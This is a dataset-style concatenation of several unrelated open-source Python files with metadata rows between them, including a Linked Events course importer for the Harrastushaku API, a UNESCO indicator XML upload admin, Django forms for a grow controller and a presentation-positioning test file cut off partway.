if hasattr(attribute, 'is_action'):
if attribute.is_action:
module_actions[attribute_name] = attribute
chosen_action = None
for action in module_actions.keys():
if getattr(self.parsed_arguments, action, False):
self.log.debug("Calling action %s from module %s",
action, module_name)
chosen_action = action
break
kallable = module_actions.get(chosen_action, None)
if kallable is not None:
self.initialize_connection()
return kallable(self)
else:
self.log.error("Action %s specified, but not implemented",
chosen_action)
def run(self):
"""
Main entry point for application
"""
self.parse_arguments()
action_result = self.dispatch_action()
if isinstance(action_result, int):
sys.exit(action_result)
elif isinstance(action_result, bool):
if action_result is True:
sys.exit(0)
else:
sys.exit(1)
| gpl-2.0 | 164,241,412,835,319,800 | 36.586592 | 80 | 0.584275 | false | 4.833333 | true | false | false |
JGoutin/compilertools | compilertools/_config_build.py | 1 | 1889 | """Extra configuration for build"""
class ConfigBuild:
"""Build configuration"""
#: Disable compilertools's optimization while building
disabled = False
#: Compiles optimized for current machine only (If not compile for a cluster of
#: possibles machines)
#: True or False for manually set value; 'autodetect' for automatically set value to
#: True if build from PIP
current_machine = "autodetect"
#: Enabled suffixes in files matrix definition.
#: If this set is not empty, includes only suffixes specified inside it.
#: This does not affect current machine builds.
suffixes_includes = set()
#: Disabled suffixes in files matrix definition.
#: If 'suffixes_includes' is empty, completes this set to not build files for a
#: specific architecture.
#: This does not affect current machine builds.
suffixes_excludes = {
"sse",
"ssse3",
"sse4_1",
"sse4_2",
"intel_atom",
"intel",
"amd",
}
#: Enables compilers options
option = {
# Enables Fast floating point math
"fast_fpmath": False
}
#: Specific API are auto-enabled when compiling and linking if following
#: preprocessors are detected in source files
api = {
# openMP
"openmp": {"c": "#pragma omp ", "fortran": ("!$omp ", "c$omp ", "*$omp ")},
# OpenACC
"openacc": {"c": "#pragma acc ", "fortran": ("!$acc ", "c$acc ", "*$acc ")},
# Intel Cilk Plus
"cilkplus": {"c": "#pragma simd ", "fortran": "!dir$ simd "},
}
#: Sources files extensions for code analysis
extensions = {
#: C/C++ sources files extensions
"c": (".c", ".cpp", ".cxx", ".cc", ".c++", ".cp"),
#: Fortran sources files extensions
"fortran": (".f", ".for", ".f90", ".f95", ".f03", ".f08", ".f15"),
}
| bsd-2-clause | 1,016,721,752,809,517,000 | 31.568966 | 88 | 0.582319 | false | 4.019149 | false | false | false |
City-of-Helsinki/linkedevents | events/importer/harrastushaku.py | 1 | 23355 | import logging
import traceback
from collections import namedtuple
from copy import deepcopy
from datetime import datetime, timedelta
from functools import lru_cache, partial
import pytz
import requests
from django.db import transaction
from django.utils.dateparse import parse_time
from django.utils.timezone import now
from django_orghierarchy.models import Organization
from events.importer.sync import ModelSyncher
from events.importer.util import clean_text
from events.importer.yso import KEYWORDS_TO_ADD_TO_AUDIENCE
from events.keywords import KeywordMatcher
from events.models import DataSource, Event, Keyword, Place
from .base import Importer, register_importer
# Per module logger
logger = logging.getLogger(__name__)
HARRASTUSHAKU_API_BASE_URL = 'http://nk.hel.fi/harrastushaku/api/'
TIMEZONE = pytz.timezone('Europe/Helsinki')
MAX_RECURRING_EVENT_LENGTH = 366 # days
MAIN_CATEGORY_KEYWORDS = {
'1': {'yso:p3466'},
'2': {'yso:p916', 'yso:p6062'},
'3': {'yso:p13084', 'yso:p2023'},
'4': {'yso:p2445', 'yso:p20405'},
'5': {'yso:p1808'},
'7': {'yso:p2851'},
'8': {'yso:p1278'},
'9': {'yso:p6940'},
'11': {'yso:p143', 'yso:p9270'},
}
AUDIENCE_BY_AGE_RANGE = (
((0, 6), {'yso:p4354'}),
((7, 16), {'yso:p16485'}),
((10, 18), {'yso:p11617'}),
)
SubEventTimeRange = namedtuple('SubEventTimeRange', ['start', 'end'])
class HarrastushakuException(Exception):
pass
@register_importer
class HarrastushakuImporter(Importer):
name = 'harrastushaku'
supported_languages = ['fi']
def setup(self):
logger.debug('Running Harrastushaku importer setup...')
self.data_source, _ = DataSource.objects.get_or_create(id=self.name, defaults={'name': 'Harrastushaku'})
self.tprek_data_source = DataSource.objects.get(id='tprek')
self.ahjo_data_source, _ = DataSource.objects.get_or_create(id='ahjo', defaults={'name': 'Ahjo'})
self.organization, _ = Organization.objects.get_or_create(origin_id='u48040030',
data_source=self.ahjo_data_source)
self.tprek_ids = {place.origin_id for place in Place.objects.filter(data_source=self.tprek_data_source)}
self.keywords = {keyword.id: keyword for keyword in Keyword.objects.all()}
self.keyword_matcher = KeywordMatcher()
def import_places(self):
"""Import Harrastushaku locations as Places
- If we can find a close-enough match for the location object coming from Harrastushaku in Toimipisterekisteri,
we do not import that location object, as this this will cause duplicate location issue due to
Harrastushaku data being of low quality.
- If, however, we cannot find a match, location object will be imported with data source "harrastushaku".
"""
logger.info('Importing places...')
locations = self.fetch_locations()
logger.debug('Handling {} locations...'.format(len(locations)))
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
for location in locations:
try:
self.handle_location(location)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling location {}: {}'.format(location.get('id'), message))
def map_harrastushaku_location_ids_to_tprek_ids(self, harrastushaku_locations):
'''
Example mapped dictionary result:
{
'95': 'harrastushaku:95',
'953': 'harrastushaku:953',
'968': 'tprek:20479',
'97': 'tprek:8062',
'972': 'tprek:9079',
'987': 'harrastushaku:987',
'99': 'tprek:8064',
}
'''
result = dict()
for harrastushaku_location in harrastushaku_locations:
harrastushaku_location_id = harrastushaku_location['id']
strict_filters = {
'id__startswith': self.tprek_data_source,
'name': harrastushaku_location['name'],
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
flexible_filters = {
'id__startswith': self.tprek_data_source,
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
tprek_place = (Place.objects.filter(**strict_filters).first() or
Place.objects.filter(**flexible_filters).first())
if tprek_place:
result[harrastushaku_location_id] = tprek_place.id
else:
result[harrastushaku_location_id] = '{}:{}'.format(self.data_source.id, harrastushaku_location_id)
return result
def import_courses(self):
"""Import Harrastushaku activities as Courses
Activities having "active" anything else than "1" or "K" will be
ignored.
When importing and an existing course isn't present in imported data:
- If the course's end time is in the past, the course will be left as
it is.
- If the course's end time is not in the past, the course will be soft
deleted alongside its sub events.
If an activity has something in field "timetables", it will be imported
as a recurring event, otherwise as a one-time event.
A recurring course will have a super event which includes the course's
whole time period, and sub events which will represent individual course
occurrences. Other than start and end times, a super event and its sub
events will all contain the same data.
A recurring course's sub event start and end datetimes will be build using
the activity's "timetables". The time tables contain info out weekday,
times, and repetition which means number of days there is between
occurrences (basically a multiple of 7).
A recurring course's sub events will be given an ID that has the
activity's ID and start and end times of the sub event in a compressed
form. This also means that between imports only sub events that are
happening exactly at the same time are considered to be the same instance,
so if a sub event's begin or end time changes at all, a new sub event will
be created instead of updating an old one (because there is no unambiguous
way to determine which old sub event the new one corresponds to).
A course's keywords will come from both of the following:
- The activity's main category. There are hardcoded keywords for every
main category.
- The activity's sub category's "searchwords". Those are manually
entered words, which are mapped to keywords using KeywordMatcher
(from events.keywords).
A course's audience will come from both of the following:
- The activity's "audience_max_age" and "audience_min_age" using
hardcoded keywords for certain age ranges.
- The course's keywords, adding the ones that are present in
KEYWORDS_TO_ADD_TO_AUDIENCE (from events.importer.yso).
"""
logger.info('Importing courses...')
locations = self.fetch_locations()
if not locations:
logger.warning('No location data fetched, aborting course import.')
return
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
activities = self.fetch_courses()
if not activities:
logger.info('No activity data fetched.')
return
def event_delete(event):
if event.end_time < now():
return
event.soft_delete()
for sub_event in event.sub_events.all():
sub_event.soft_delete()
self.event_syncher = ModelSyncher(
Event.objects.filter(data_source=self.data_source, super_event=None),
lambda event: event.id,
event_delete,
)
num_of_activities = len(activities)
logger.debug('Handling {} activities...'.format(num_of_activities))
for i, activity in enumerate(activities, 1):
try:
self.handle_activity(activity)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling activity {}: {}'.format(activity.get('id'), message))
if not i % 10:
logger.debug('{} / {} activities handled.'.format(i, num_of_activities))
self.event_syncher.finish(force=True)
logger.info('Course import finished.')
def fetch_locations(self):
logger.debug('Fetching locations...')
try:
url = '{}location/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()
except requests.RequestException as e:
logger.error('Cannot fetch locations: {}'.format(e))
return []
def fetch_courses(self):
logger.debug('Fetching courses...')
try:
url = '{}activity/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()['data']
except requests.RequestException as e:
logger.error('Cannot fetch courses: {}'.format(e))
return []
@transaction.atomic
def handle_location(self, location_data):
harrastushaku_location_id = location_data.get('id')
harrastushaku_location_mapped_id = self.location_id_to_place_id.get(harrastushaku_location_id)
if harrastushaku_location_mapped_id.startswith(self.tprek_data_source.id):
return
else:
self.handle_non_tprek_location(location_data)
def handle_non_tprek_location(self, location_data):
get_string = bind_data_getters(location_data)[0]
place_data = {
'name': get_string('name', localized=True),
'info_url': get_string('url', localized=True),
'street_address': get_string('address', localized=True),
'address_locality': get_string('city', localized=True),
'postal_code': get_string('zip'),
'data_source': self.data_source,
'origin_id': location_data['id'],
'publisher': self.organization,
}
self.save_place(place_data)
@transaction.atomic
def handle_activity(self, activity_data):
if activity_data.get('active') not in ('1', 'K'):
logger.debug('Skipping inactive activity {}'.format(activity_data.get('id')))
return
event_data = self.get_event_data(activity_data)
if event_data['start_time'] > event_data['end_time']:
raise HarrastushakuException('Start time after end time')
time_tables = activity_data.get('timetables', [])
if time_tables:
self.handle_recurring_event(event_data, time_tables)
else:
self.handle_one_time_event(event_data)
def create_registration_links(self, activity_data):
# Harrastushaku has own registration links which should be created in the imported events as well
if activity_data.get('regavailable', 0) and '1' in activity_data['regavailable']:
# regstart and regend sometimes take "false" value which seem to mean in the cases regavailable=='1' that
# the registration is going on indefinitely
reg_start = activity_data['regstartdate'] if isinstance(activity_data['regstartdate'], int) else 0
reg_end = activity_data['regenddate'] if isinstance(activity_data['regenddate'], int) else 9999999999
if datetime.utcfromtimestamp(reg_start) <= datetime.utcnow() <= datetime.utcfromtimestamp(reg_end):
return {'fi': {'registration': f"https://harrastushaku.fi/register/{activity_data['id']}"}}
return ''
def get_event_data(self, activity_data):
get_string, get_int, get_datetime = bind_data_getters(activity_data)
keywords = self.get_event_keywords(activity_data)
audience = self.get_event_audiences_from_ages(activity_data) | self.get_event_audiences_from_keywords(keywords)
keywords |= audience
event_data = {
'name': get_string('name', localized=True),
'description': get_string('description', localized=True),
'audience_max_age': get_int('agemax'),
'audience_min_age': get_int('agemin'),
'start_time': get_datetime('startdate'),
'end_time': get_datetime('enddate'),
'date_published': get_datetime('publishdate'),
'external_links': self.create_registration_links(activity_data),
'organizer_info': self.get_organizer_info(activity_data),
'extension_course': {
'enrolment_start_date': get_datetime('regstartdate'),
'enrolment_end_date': get_datetime('regenddate'),
'maximum_attendee_capacity': get_int('maxentries'),
'remaining_attendee_capacity': get_int('regavailable'),
},
'data_source': self.data_source,
'origin_id': activity_data['id'],
'publisher': self.organization,
'location': self.get_event_location(activity_data),
'keywords': keywords,
'in_language': self.get_event_languages(activity_data),
'images': self.get_event_images(activity_data),
'offers': self.get_event_offers(activity_data),
'audience': audience,
}
return event_data
def handle_recurring_event(self, event_data, time_tables):
start_date, end_date = self.get_event_start_and_end_dates(event_data)
if not start_date:
raise HarrastushakuException('No start time')
if not end_date:
raise HarrastushakuException('No end time')
if end_date - start_date > timedelta(days=MAX_RECURRING_EVENT_LENGTH):
raise HarrastushakuException('Too long recurring activity')
sub_event_time_ranges = self.build_sub_event_time_ranges(start_date, end_date, time_tables)
if not sub_event_time_ranges:
raise HarrastushakuException('Erroneous time tables: {}'.format(time_tables))
super_event = self.save_super_event(event_data)
self.save_sub_events(event_data, sub_event_time_ranges, super_event)
def handle_one_time_event(self, event_data):
event_data['has_start_time'] = False
event_data['has_end_time'] = False
event = self.save_event(event_data)
self.event_syncher.mark(event)
def get_event_keywords(self, activity_data):
keywords = (self.get_event_keywords_from_main_categories(activity_data) |
self.get_event_keywords_from_search_words(activity_data))
return keywords
def get_event_keywords_from_main_categories(self, activity_data):
main_category_ids = {c.get('maincategory_id') for c in activity_data.get('categories', [])}
keyword_ids = set()
for main_category_id in main_category_ids:
keyword_ids |= MAIN_CATEGORY_KEYWORDS.get(main_category_id, set())
return {self.keywords.get(kw_id) for kw_id in keyword_ids if kw_id in self.keywords}
def get_event_keywords_from_search_words(self, activity_data):
keywords = set()
search_words = activity_data.get('searchwords', [])
cleaned_search_words = [s.strip().lower() for s in search_words.split(',') if s.strip()]
for kw in cleaned_search_words:
matches = self.match_keyword(kw)
if matches:
keywords |= set(matches)
return keywords
def get_event_languages(self, activity_data):
language_text = activity_data.get('languages', '').lower()
languages = {obj for code, obj in self.languages.items() if obj.name_fi and obj.name_fi in language_text}
return languages
def get_event_start_and_end_dates(self, event_data):
start_datetime = event_data.get('start_time')
start_date = start_datetime.date() if start_datetime else None
end_datetime = event_data.get('end_time')
end_date = end_datetime.date() if end_datetime else None
return start_date, end_date
def get_organizer_info(self, activity_data):
org_details = clean_text(activity_data.get('organiserdetails', ''), strip_newlines=True, parse_html=True)
reg_details = clean_text(activity_data.get('regdetails', ''), strip_newlines=True, parse_html=True)
return {'fi': f'{reg_details} {org_details}'.strip()} if org_details or reg_details else ''
def build_sub_event_time_ranges(self, start_date, end_date, time_tables):
sub_event_time_ranges = []
for time_table in time_tables:
current_date = start_date
weekday = int(time_table.get('weekday'))
start_time = parse_time(time_table.get('starttime'))
end_time = parse_time(time_table.get('endtime'))
repetition = int(time_table.get('repetition'))
if repetition == 0:
repetition = 7 # assume repetition 0 and 7 mean the same thing
if not (weekday and repetition) or start_time >= end_time:
continue
while current_date.isoweekday() != weekday:
current_date += timedelta(days=1)
while current_date <= end_date:
sub_event_time_ranges.append(SubEventTimeRange(
datetime.combine(current_date, start_time).astimezone(TIMEZONE),
datetime.combine(current_date, end_time).astimezone(TIMEZONE),
))
current_date += timedelta(days=repetition)
return sub_event_time_ranges
def save_super_event(self, event_data):
super_event_data = deepcopy(event_data)
super_event_data['super_event_type'] = Event.SuperEventType.RECURRING
event = self.save_event(super_event_data)
self.event_syncher.mark(event)
return event
def save_sub_events(self, event_data, sub_event_time_ranges, super_event):
super_event._changed = False
def delete_sub_event(obj):
logger.debug('{} deleted'.format(obj))
obj.deleted = True
obj.save()
sub_event_syncher = ModelSyncher(
super_event.sub_events.filter(deleted=False), lambda o: o.id, delete_func=delete_sub_event)
sub_event_data = deepcopy(event_data)
sub_event_data['super_event'] = super_event
for sub_event_time_range in sub_event_time_ranges:
sub_event_data['start_time'] = sub_event_time_range.start
sub_event_data['end_time'] = sub_event_time_range.end
sub_event_data['origin_id'] = (
event_data['origin_id'] + self.create_sub_event_origin_id_suffix(sub_event_time_range))
sub_event = self.save_event(sub_event_data)
if sub_event._changed:
super_event._changed = True
sub_event_syncher.mark(sub_event)
old_sub_event_count = super_event.sub_events.count()
sub_event_syncher.finish(force=True)
if super_event.sub_events.count() != old_sub_event_count:
super_event._changed = True
if super_event._changed:
super_event.save()
def create_sub_event_origin_id_suffix(self, sub_event_time_range):
start, end = sub_event_time_range
assert start.date() == end.date()
date = start.date().strftime('%Y%m%d')
times = '{}{}'.format(*(time.time().strftime('%H%M') for time in (start, end)))
return '_{}{}'.format(date, times)
def get_event_images(self, activity_data):
image_data = activity_data.get('images')
if not isinstance(image_data, dict):
return []
event_image_data = [{
'name': image_datum.get('name', ''),
'url': image_datum.get('filename', ''),
} for image_datum in image_data.values()]
return event_image_data
def get_event_location(self, activity_data):
location_id = activity_data.get('location_id')
if not location_id:
return None
return {'id': self.location_id_to_place_id.get(location_id)}
def get_event_offers(self, activity_data):
offers = []
for price_data in activity_data.get('prices', ()):
get_string = bind_data_getters(price_data)[0]
price = get_string('price', localized=False)
description = get_string('description', localized=True)
is_free = price is not None and price == '0'
if not description and len(activity_data['prices']) == 1:
description = get_string('pricedetails', localized=True)
offers.append({
'price': price if not is_free else None,
'is_free': is_free,
'description': description,
})
return offers
def get_event_audiences_from_ages(self, activity_data):
audience_keyword_ids = set()
age_min = get_int_from_data(activity_data, 'agemin') or 0
age_max = get_int_from_data(activity_data, 'agemax') or 200
for age_range, keyword_ids in AUDIENCE_BY_AGE_RANGE:
if ranges_overlap(age_min, age_max, age_range[0], age_range[1]):
audience_keyword_ids |= keyword_ids
return {self.keywords.get(k_id) for k_id in audience_keyword_ids if k_id in self.keywords}
def get_event_audiences_from_keywords(self, keywords):
return {kw for kw in keywords if kw.id in KEYWORDS_TO_ADD_TO_AUDIENCE}
@lru_cache()
def match_keyword(self, text):
return self.keyword_matcher.match(text)
def get_string_from_data(data, field, localized=False):
value = data.get(field)
if not isinstance(value, str):
return None
value = clean_text(value)
if not value:
return None
return {'fi': value} if localized else value
def get_int_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return int(value)
def get_datetime_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return datetime.utcfromtimestamp(int(value)).replace(tzinfo=pytz.utc).astimezone(TIMEZONE)
def bind_data_getters(data):
get_string = partial(get_string_from_data, data)
get_int = partial(get_int_from_data, data)
get_datetime = partial(get_datetime_from_data, data)
return get_string, get_int, get_datetime
def ranges_overlap(x1, x2, y1, y2):
return x1 <= y2 and y1 <= x2
| mit | 8,116,336,283,692,511,000 | 40.117958 | 119 | 0.619739 | false | 3.798796 | false | false | false |
sitian/wing | services/wroute/wrouted.py | 1 | 1264 | # wrouted.py
#
# Copyright (C) 2013 Yi-Wei Ci <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from poller import WRoutePoller
from worker import WRouteWorker
import sys
sys.path.append('../../lib')
from default import WROUTE_ROLE
if __name__ == '__main__':
if WROUTE_ROLE != 1:
poller = WRoutePoller()
poller.run()
if WROUTE_ROLE != 0:
worker = WRouteWorker()
worker.start()
worker.join()
if WROUTE_ROLE != 1:
poller.join()
| gpl-2.0 | 6,322,507,919,008,522,000 | 34.111111 | 75 | 0.651108 | false | 3.830303 | false | false | false |
VincentVW/OIPA | OIPA/indicator_unesco/admin.py | 3 | 6035 | import xml.etree.cElementTree as etree
from django.contrib import admin
from django.shortcuts import get_object_or_404
from multiupload.admin import MultiUploadAdmin
from indicator.upload_indicators_helper import find_country, find_city, get_countries, get_cities, get_value, save_log, save_city_data, save_country_data
from indicator_unesco.models import UnescoIndicatorData, UnescoIndicator
from translation_model.models import TranslationModel
class UnescoIndicatorDataUploadAdmin(MultiUploadAdmin):
list_display = ['unesco_indicator','country', 'value']
search_fields = ['unesco_indicator']
list_filter = ['unesco_indicator', 'country']
# default value of all parameters:
change_form_template = 'multiupload/change_form.html'
change_list_template = 'multiupload/change_list.html'
multiupload_template = 'multiupload/upload_unesco.html'
# if true, enable multiupload on list screen
# generaly used when the model is the uploaded element
multiupload_list = True
# if true enable multiupload on edit screen
# generaly used when the model is a container for uploaded files
# eg: gallery
# can upload files direct inside a gallery.
multiupload_form = True
# max allowed filesize for uploads in bytes
multiupload_maxfilesize = 3 * 2 ** 20 # 3 Mb
# min allowed filesize for uploads in bytes
multiupload_minfilesize = 0
# tuple with mimetype accepted
multiupload_acceptedformats = ("text/xml",)
def process_uploaded_file(self, uploaded, object,request, **kwargs):
'''
This method will be called for every csv file uploaded.
Parameters:
:uploaded: instance of uploaded file
:object: instance of object if in form_multiupload else None
:kwargs: request.POST received with file
Return:
It MUST return at least a dict with:
{
'url': 'url to download the file',
'thumbnail_url': 'some url for an image_thumbnail or icon',
'id': 'id of instance created in this method',
'name': 'the name of created file',
}
'''
line_counter = 0
country_found = []
country_not_found = []
total_items_saved = 0
countries = get_countries()
#getting the title of the file
title = kwargs.get('title', [''])[0] or uploaded.name
xmlDoc = uploaded
xmlDocData = xmlDoc.read()
xmlDocTree = etree.XML(xmlDocData)
for indicator in xmlDocTree.iter('CountryId'):
indicator_name_en = indicator[1].text.rstrip()
indicator_name_fr = indicator[2].text.rstrip()
indicator_country = indicator[0].text.rstrip()
country_iso = indicator.get('countryid').rstrip()
value = indicator[3].text.rstrip()
type_value = None
try:
website_en = indicator[4].text.rstrip()
website_fr = indicator[5].text.rstrip()
except IndexError:
website_en = None
website_fr = None
#try to find the indicator that is uploaded or create a new one
indicator_from_db = UnescoIndicator.objects.get_or_create(id=indicator_name_en)[0]
#getting country from our database
country_from_db = find_country(country_name=indicator_country, countries=countries, iso2=country_iso)
#add country to the log array
if country_from_db:
country_found.append(indicator_country)
else:
if indicator_country:
country_not_found.append(indicator_country)
#saving the unesco indicator data
if country_from_db:
indicator_data_from_db = UnescoIndicatorData.objects.get_or_create(unesco_indicator=indicator_from_db, country=country_from_db, value=value)[0]
#storing the translation of the indicator
TranslationModel.objects.get_or_create(key=indicator_name_en, language='en', translation=indicator_name_en)
TranslationModel.objects.get_or_create(key=indicator_name_en, language='fr', translation=indicator_name_fr)
if website_en:
indicator_data_from_db.website = website_en
indicator_data_from_db.save()
#we need to store the translations as well
TranslationModel.objects.get_or_create(key=website_en, language='en', translation=website_en)
TranslationModel.objects.get_or_create(key=website_en, language='fr', translation=website_fr)
total_items_saved += 1
line_counter += 1
log = save_log(file=uploaded,
uploaded_by_user=request.user,
cities_not_found=[],
countries_not_found=country_not_found,
total_cities_found=[],
total_countries_found=country_found,
total_cities_not_found=[],
total_countries_not_found=country_not_found,
total_items_saved=total_items_saved
)
return {
'url': '/admin/indicator/csvuploadlog/%s/' % str(log.id),
'thumbnail_url': '',
'id': str(log.id),
'name' : title,
'country_not_found' : log.countries_not_found,
'total_countries_not_found' : country_not_found.__len__(),
'city_not_found' : log.cities_not_found,
'total_cities_not_found' : 0,
'total_items_saved' : str(total_items_saved),
}
def delete_file(self, pk, request):
'''
Function to delete a file.
'''
# This is the default implementation.
obj = get_object_or_404(self.queryset(request), pk=pk)
obj.delete()
admin.site.register(UnescoIndicatorData, UnescoIndicatorDataUploadAdmin)
admin.site.register(UnescoIndicator)
| agpl-3.0 | 3,671,623,313,713,921,500 | 38.444444 | 159 | 0.613422 | false | 4.18516 | false | false | false |
jpk0727/growApp | apps/base/forms.py | 1 | 2289 | import time
import json
import moment
from datetime import datetime
from django import forms
from base.models import sensors, controller_setpoints
from django.utils.translation import ugettext_lazy as _
from bootstrap3_datetime.widgets import DateTimePicker
# class DateForm(forms.Form):
# start_date = forms.DateField(
# widget=DateTimePicker())
# end_date = forms.DateField(
class DateForm(forms.Form):
end = sensors.objects.latest('time')
end_time = datetime.fromtimestamp(
int(end.time)).strftime('%Y-%m-%d %H:%M')
start = sensors.objects.earliest('time')
start_time = datetime.fromtimestamp(
int(start.time)).strftime('%Y-%m-%d %H:%M')
start_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate": start_time,
"sideBySide": True}))
end_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate":end_time,
"sideBySide": True}))
class ControlForm(forms.ModelForm):
lights_on = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
lights_off = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
class Meta:
model = controller_setpoints
fields = ['humidity','r1_water','r2_water','r3_water','water_frequency','lights_on','lights_off']
labels = {
"humidity":_("Relative Percent Humidity"),
"r1_water":_("Number of Seconds to Water Row 1"),
"r2_water":_("Number of Seconds to Water Row 2"),
"r3_water":_("Number of Seconds to Water Row 3"),
"water_frequency":_("How often to water in minutes"),
"lights_on":_("What time of day to start the lights"),
"lights_off":_("What time of day to turn off the lights")
}
| mit | 7,060,045,979,482,628,000 | 34.215385 | 105 | 0.571865 | false | 3.939759 | false | false | false |
regebro/hovercraft | tests/test_position.py | 1 | 30682 | import os
import unittest
from pkg_resources import resource_string
from lxml import etree
from hovercraft.parse import rst2xml, SlideMaker
from hovercraft.position import gather_positions, calculate_positions, position_slides
TEST_DATA = os.path.join(os.path.split(__file__)[0], "test_data")
def make_tree(file_name):
"""Loads reStructuredText, outputs an lxml tree"""
rst = resource_string(__name__, os.path.join("test_data", file_name))
xml, deps = rst2xml(rst)
return SlideMaker(etree.fromstring(xml)).walk()
class GatherTests(unittest.TestCase):
"""Tests that position information is correctly parsed"""
def test_gathering(self):
tree = make_tree("positioning.rst")
positions = list(gather_positions(tree))
self.assertEqual(
positions,
[
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "1",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "0",
"data-y": "0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "90",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "3000",
"data-y": "1000",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "firstID+1000",
"data-y": "firstID-500",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "secondID+800",
"data-y": "200",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
],
)
class CalculateTests(unittest.TestCase):
"""Tests that positions are correctly calculated"""
def test_square(self):
# Slides, positioned in a square
positions = [
{"data-x": "0", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r0", "data-y": "r1000"},
{"data-x": "r0", "data-y": "r1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
